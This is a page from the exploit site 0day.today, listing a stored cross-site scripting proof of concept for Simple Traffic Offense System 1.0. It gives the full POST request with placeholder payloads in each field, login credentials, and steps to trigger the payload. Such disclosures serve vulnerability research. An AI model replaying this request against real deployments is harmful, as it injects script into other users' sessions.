0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simple Traffic Offense System 1.0 - Stored Cross Site Scripting Vulnerability
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) # Exploit Author: Barış Yıldızoğlu # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 # Description: Almost all inputs contain Stored XSS on the website Request: POST /Trafic/save-reported.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 168 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Trafic/report-offence.php Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo Upgrade-Insecure-Requests: 1 offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload here}&name={Payload here}&address={Payload here}&gender={Payload here}&officer_reporting={Payload here}&offence={Payload here} # Steps to Reproduce: [1.] Login to the system [+] username=Torrahclef&pass=yemiyemi [2.] Go to the Report Offense page [3.] Send the request above with the Stored XSS payload [4.] Dashboard and Offense list pages will be triggered # 0day.today [2024-12-26] #